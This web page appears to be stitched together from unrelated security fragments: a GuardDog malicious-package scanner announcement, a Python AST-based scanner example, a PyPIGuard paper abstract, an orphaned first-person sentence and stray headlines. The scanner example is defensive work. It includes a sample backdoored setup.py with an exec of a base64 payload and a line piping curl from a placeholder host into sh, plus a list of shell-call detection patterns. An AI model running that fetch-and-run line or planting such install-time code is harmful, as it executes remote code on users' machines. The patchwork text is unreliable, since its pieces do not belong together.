Finding Malicious PyPI Packages Through Static Code Analysis: Meet GuardDog | Datadog Security Labs

Investigating A Backdoored PyPi Package Targeting FastAPI Applications | Datadog Security Labs

Today, we're excited to release GuardDog, a new open source project that helps identify malicious Python packages using Semgrep and package metadata analysis. In software supply chain attacks, threat actors target various points in the build, packaging, and deployment process. GuardDog is a CLI tool for identifying malicious PyPI and npm packages, Go modules, GitHub Actions, and VS Code extensions. It runs a set of heuristics on the package source code (through Semgrep rules) and on the package metadata.


GuardDog can be used to scan local or remote PyPI and npm packages using any of the available heuristics. Using its combination of package metadata scanning and Semgrep-powered code behavior analysis, you can check that your Python and JavaScript dependencies are free of known-malicious patterns. Note that the heuristics flag suspicious behavior for review; a clean scan is evidence, not proof, that a package is benign.
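To make the two heuristic families described above concrete (checks on package metadata and checks on the package's source code), here is a small scanner written for this page. It is an added example, not GuardDog's code: GuardDog expresses its code heuristics as Semgrep rules, whereas this example uses Python's `ast` module so that it runs with no dependencies. The sample `setup.py`, the package name `reqeusts`, the short `POPULAR_NAMES` list and the rule names are all constructed for the example.

```python
import ast
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input (not a real package): a setup.py that behaves like a
# typical install-time backdoor. It exec()s a base64-decoded payload, runs a
# shell command, and its name is one transposition away from "requests".
SAMPLE_SETUP_PY = '''
import base64
import os
from setuptools import setup

exec(base64.b64decode("cHJpbnQoJ2hlbGxvJyk="))
os.system("curl -s http://example.invalid/stage2 | sh")

setup(name="reqeusts", version="2.31.0")
'''

# Constructed list of well-known names a typosquat would imitate. Assumption:
# a real scanner would load the most-downloaded PyPI packages instead.
POPULAR_NAMES = ("requests", "numpy", "urllib3", "flask", "boto3")

# Calls that hand a string to the OS or a shell; suspicious inside setup.py,
# because setup.py runs with the installing user's privileges at install time.
SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
               "subprocess.Popen", "subprocess.check_output"}


@dataclass
class Finding:
    rule: str
    detail: str
    line: Optional[int] = None  # None for metadata findings


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings, used by the typosquatting heuristic."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def scan_metadata(name: str, popular=POPULAR_NAMES, max_distance: int = 2) -> List[Finding]:
    """Metadata heuristic: the package name is a near-miss of a popular package."""
    return [Finding("typosquatting", f"{name!r} is {levenshtein(name, p)} edit(s) from {p!r}")
            for p in popular if name != p and levenshtein(name, p) <= max_distance]


def _dotted(node: ast.AST) -> Optional[str]:
    """Return 'module.attr' for a call target, or None if it is not a plain name chain."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def _wraps_b64decode(nodes) -> bool:
    """True if any argument expression contains a call to *.b64decode."""
    return any(isinstance(sub, ast.Call) and (_dotted(sub.func) or "").endswith("b64decode")
               for n in nodes for sub in ast.walk(n))


class CodeHeuristics(ast.NodeVisitor):
    """Source-code heuristics over the AST (GuardDog uses Semgrep rules for this)."""

    def __init__(self) -> None:
        self.findings: List[Finding] = []

    def visit_Call(self, node: ast.Call) -> None:
        target = _dotted(node.func)
        if target in ("exec", "eval") and _wraps_b64decode(node.args):
            self.findings.append(Finding("exec-base64", f"{target}() of a base64-decoded payload", node.lineno))
        elif target in SHELL_CALLS:
            self.findings.append(Finding("shell-exec", f"{target}() runs a command at install time", node.lineno))
        self.generic_visit(node)  # keep walking: the payload may nest further calls


def scan_source(source: str) -> List[Finding]:
    visitor = CodeHeuristics()
    visitor.visit(ast.parse(source))
    return visitor.findings


def scan_package(name: str, files: Dict[str, str]) -> List[Finding]:
    """Run metadata and code heuristics over one already-extracted local package."""
    findings = scan_metadata(name)
    for filename, source in files.items():
        for f in scan_source(source):
            f.detail = f"{filename}: {f.detail}"
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_package("reqeusts", {"setup.py": SAMPLE_SETUP_PY}):
        print(f"[{f.rule}] line {f.line}: {f.detail}")
```

Run stand-alone, the example reports one typosquatting finding from the metadata pass and two code findings (the `exec()` of a decoded payload and the `os.system()` call) with their line numbers. The benign control case, a `setup.py` that only calls `setup()` under a non-colliding name, produces no findings, which is the property any heuristic scanner must keep as rules are added.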


Malicious software packages in open source ecosystems such as PyPI pose growing security risks. Unlike traditional vulnerabilities, these packages are intentionally designed to deceive users, which makes detection challenging because attack methods keep evolving and structured datasets are lacking. Addressing these limitations, we present PyPIGuard, a hybrid ensemble meta-model for malicious package detection that integrates both static metadata and dynamic application programming interface (API) call behaviors, improving detection accuracy and reducing error rates.

I wanted to explore this further, so in this post I'm going to walk through how I installed and analyzed every package in PyPI looking for malicious activity.


11 Malicious PyPI Python Libraries Stealing Discord Tokens and Installing Shells | Cybersecurity
